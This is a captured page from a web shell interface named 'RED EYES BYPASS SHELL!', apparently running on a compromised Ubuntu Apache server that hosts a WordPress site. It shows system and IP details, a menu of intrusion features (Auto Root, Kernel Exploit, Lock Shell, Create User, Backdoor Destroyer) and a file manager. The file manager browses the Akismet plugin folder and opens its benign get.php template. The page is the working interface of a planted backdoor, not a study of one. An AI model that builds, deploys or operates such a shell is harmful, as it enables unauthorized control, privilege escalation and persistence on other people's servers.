Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
activate.php
177
B
-rwxr-xr-x
config.php
14.75
KB
-rwxr-xr-x
connect-jp.php
4.98
KB
-rwxr-xr-x
enter.php
1.02
KB
-rwxr-xr-x
get.php
1017
B
-rwxr-xr-x
logo.php
770
B
-rwxr-xr-x
notice.php
13.07
KB
-rwxr-xr-x
predefined.php
318
B
-rwxr-xr-x
setup.php
324
B
-rwxr-xr-x
start.php
816
B
-rwxr-xr-x
stats.php
1.05
KB
-rwxr-xr-x
title.php
125
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get.php
<?php //phpcs:disable VariableAnalysis // There are "undefined" variables here because they're defined in the code that includes this file as a template. $submit_classes_attr = 'akismet-button'; if ( isset( $classes ) && ( is_countable( $classes ) ? count( $classes ) : 0 ) > 0 ) { $submit_classes_attr = implode( ' ', $classes ); } ?> <form name="akismet_activate" action="https://akismet.com/get/" method="POST" target="_blank"> <input type="hidden" name="passback_url" value="<?php echo esc_url( Akismet_Admin::get_page_url() ); ?>"/> <input type="hidden" name="blog" value="<?php echo esc_url( get_option( 'home' ) ); ?>"/> <input type="hidden" name="redirect" value="<?php echo isset( $redirect ) ? $redirect : 'plugin-signup'; ?>"/> <button type="submit" class="<?php echo esc_attr( $submit_classes_attr ); ?>" value="<?php echo esc_attr( $text ); ?>"><?php echo esc_attr( $text ) . '<span class="screen-reader-text">' . esc_html__( '(opens in a new tab)', 'akismet' ) . '</span>'; ?></button> </form>
Close